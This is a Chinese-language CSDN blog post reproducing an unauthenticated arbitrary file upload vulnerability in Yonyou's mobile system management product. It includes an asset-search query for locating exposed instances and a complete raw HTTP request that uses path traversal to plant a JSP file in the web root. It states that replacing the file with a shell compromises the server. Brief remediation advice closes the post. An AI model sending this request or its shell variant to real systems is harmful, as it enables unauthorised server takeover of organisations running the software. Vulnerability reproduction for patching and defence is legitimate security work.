用友移动管理系统 upload任意文件上传漏洞

最新推荐文章于 2024-04-25 23:16:24 发布
最新推荐文章于 2024-04-25 23:16:24 发布
阅读量571 收藏 7
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/135522438
版权
用友移动系统管理系统存在任意文件上传漏洞,攻击者可上传恶意文件获取服务器权限。建议升级至安全版本,限制公网访问并设置白名单访问策略以保护系统安全。
摘要由CSDN通过智能技术生成

产品介绍

用友移动系统管理系统是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。

漏洞描述

用友移动系统管理系统/mobsm/common/upload等接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。

资产测绘

app=“用友-移动系统管理”
在这里插入图片描述

漏洞复现

POST /mobsm/common/upload?category=../webapps/nc_web/maupload/apk HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: */*
Cache-Control: no-cache
Postman-Token: c934bfdc-e761-442d-9471-2e2f3b5da156
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------800717874476702101754515
Content-Length: 255

----------------------------800717874476702101754515
Content-Disposition: form-data; name="file"; filename="1test.jsp"
Content-Type: application/octet-stream

<%
     out.println("ok!");
%>
----------------------------800717874476702101754515--

在这里插入图片描述
访问上传后的文件
在这里插入图片描述
将文件内容改为shell,可导致服务器沦陷。

修复建议

1、升级到安全版本
2、如非必要,禁止公网访问该系统。
3、设置白名单访问。

keepb1ue
关注
  • 8
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】用友NC-任意文件-uploadFile
知黑而守白
05-05 182
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC允许攻击者通过uploadFile接口构造特定的请求包进行任意文件。该漏洞使得攻击者可以在受影响的系统上上恶意文件,潜在风险包括远程执行恶意代码、访问敏感数据,以及其他危险操作。
任意文件漏洞
gaomei2009的专栏
08-24 2314
任意文件漏洞
《WEB安全漏洞30讲》(第5讲)任意文件漏洞
午夜安全
05-22 3327
文件漏洞,指攻击者利用程序缺陷绕过系统文件的验证与处理策略将恶意程序上到服务器并获得执行服务器端命令的能力。这个漏洞其实非常简单,就是攻击者给服务器上了恶意的木马程序,然后利用此木马程序执行操作系统命令,从而获得服务器权限,造成严重的安全隐患。比如一个JAVA系统本来需要上身份证图片进行用户实名认证,结果恶意用户上了jsp木马文件,之后利用这个文件执行系统命令,再以这个系统为据点,对内网其他互通的系统进行攻击,这样将导致整个内网系统的沦陷。
漏洞复现】Weblogic 任意文件漏洞(CVE-2018-2894)
最新发布
m0_69043895的博客
04-25 467
Oracle在7月更新中,修复了Weblogic Web Service Test Page中一处任意文件漏洞,Web Service Test Page在"生产模式"下默认不开启,所以该漏洞有一定限制,利用该漏洞,可以上任意.jsp文件,进而获取服务器权限。
文件漏洞
热门推荐
weixin_59872639的博客
02-22 1万+
文件 文件是现代互联网常见的功能,允许用户上图片、视频、及其他类型文件,向用户提供的功能越多,Web受攻击的风险就越大。 文件漏洞文件时,如果未对上文件进行严格的验证和过滤,就容易造成文件漏洞,上脚本文件(包括asp、aspx、php、jsp等) 恶意上行为可能导致网站甚至整个服务器被控制。恶意的脚本文件又被称为WebShell,WebShell具有强大的功能,如查看服务器目录、服务器中文件、执行系统命令等。 文件漏洞成因 文件漏洞的成因(复杂),一方
网络安全进阶学习第五课——文件漏洞
p36273的博客
07-03 4565
黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。getimagesize()函数会读取目标文件的16进制,验证目标文件16进制的头几个字符串是否符合图片的要求,通过此函数判断文件类型。通常在一个请求中,同样名称的参数只会出现一次,函数包含的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行。
任意文件漏洞原理及上利用案例(任意文件漏洞怎么解决)
白帽黑客八哥的博客
12-18 1610
任意文件漏洞是一种Web应用程序中常见的安全漏洞,攻击者通过该漏洞可以上恶意文件到服务器上。这可能导致多种安全问题,包括远程代码执行、服务器拒绝服务等。通常,攻击者通过构造特定的文件请求,绕过应用程序的文件类型验证和访问控制,成功上具有恶意代码的文件
用友NC任意文件漏洞利用工具
04-14
用友NC任意文件漏洞利用工具,用友NC...漏洞成因在于上文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击者可在目标系统任意文件执行命令。
用友软件的系统管理.pptx
11-21
用友软件系统管理 用友软件系统管理是指对用友软件系统的安装、配置、维护和管理。该系统是基于用友U8管理软件,旨在为中小企业提供一站式的信息化解决方案。下面是对用友软件系统管理的详细介绍: 一、用友软件...
用友ERP生产管理系统实验报告.docx
05-26
用友ERP生产管理系统实验报告.
用友U821管理软件的工资系统.ppt
11-12
用友U821管理软件的工资系统知识点总结 用友U821管理软件的工资系统是企业人力资源管理中的一项重要组件,负责处理工资核算、工资发放、个人所得税计算等功能。本总结将对用友U821管理软件的工资系统进行详细的知识...
用友U8固定资产管理系统PPT课件
06-28
用友U8固定资产管理系统详解》 固定资产管理系统用友U8财务管理软件中的一个重要组成部分,它专门用于管理企业的固定资产,确保资产信息的准确性和完整性,从而支持企业的决策制定。本篇将深入探讨该子系统...
任意文件漏洞详解与防护
鑫和皓的博客
08-10 1832
任意文件漏洞是一种常见的网络安全问题,它允许攻击者上并执行恶意文件,从而获取或破坏系统数据。上恶意脚本:攻击者可以上包含恶意代码的脚本文件,如PHP、ASP、JSP等,然后通过浏览器访问这些文件,执行恶意代码。上恶意二进制文件:攻击者可以上包含恶意代码的二进制文件,如DLL、EXE等,然后利用其他漏洞或手段执行这些文件。严格检查上文件:对上文件的类型、大小、名字和内容进行严格的检查,只接受符合要求的文件。使用安全编程技术:在编写文件功能时,使用安全编程技术,如预备语句、输入验证等。
任意文件漏洞(简介)
diaobusi的博客
08-22 650
文件是指将文件从本地计算机或其他设备上到网络服务器或其他存储位置的过程。通过文件,您可以将文件(如图像、文档、音频或视频等)输到网络上的不同位置,以实现文件共享、备份、存储或与他人共享内容等目的。用户选择要上文件:用户在自己的设备上选择要上文件,可能通过文件资源管理器、拖放文件或选择文件对话框等方式进行。文件输至服务器:一旦用户选择文件,通过网络将文件发送到特定的服务器。可以使用各种协议,如HTTP、FTP、SFTP等来实现文件输。
【WEB漏洞原理】任意文件漏洞
过期的秋刀鱼
08-29 1900
文件是web应用必备功能之一,如:头像上,附件分享登,如果服务器配置不当或者 没有进行足够的过滤,Web用户就可以上任意文件,包括恶意脚本文件,exe 程序等等,这就造成了任意文件漏洞
文件漏洞篇02任意文件漏洞方法和攻击方法
qq_61861243的博客
04-16 871
头像上、修改上文件编辑器中文件、图片上、媒体上。举例:通过抓包上恶意文件进行测试,上后缀名为asp、php、aspx等动态语言脚本,查看上时返回的信息,判断是否能直接上,如果不能直接上,再进行此时上突破。(例如:上文件的时候只允许图片格式 的后缀,但修改文件却没有限制后缀名,图片文件就可以修改成php文件,就有可能访问这个文件的URL(网址)直接getshell(获取),控制网站。
web漏洞文件漏洞
wutiangui的博客
06-22 2064
严重:本地文件包含不仅能够包含web文件目录中的一些配置文件(比如Web应用、数据库配置文件、config文件),还可以查看到一些Web动态页面的源代码,为攻击者进一步发掘web应用漏洞提供条件,甚至一旦与路径遍历漏洞相结合,还可能直接攫取目标系统的用户名与密码等文件。在PHP中,使用include、require、include_once、require_once函数包含的文件都会被当作PHP代码执行,无论文件的名称是什么,只要符合文件内容符合PHP代码规范,都会被当作PHP代码执行。
3、任意文件漏洞
feiwujiushiwo的博客
01-07 851
文件漏洞( Unrestricted File Upload)网站上功能过滤不严格,导致用户可通过上文件系统造成危害。上服务端可解析的脚本文件造成远程代码执行、上超大文件造成拒绝服务、上Html文件引发XSS等。Web通用漏洞严重/中危上文件Getshell/上HTML文件实现XSS攻击、上超大文件引发拒绝服务等。
文件漏洞-原理篇
AkangBoy的博客
12-02 3407
本文主要介绍文件漏洞原理、危害等基础知识,以及常见的文件检测机制和绕过手段
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值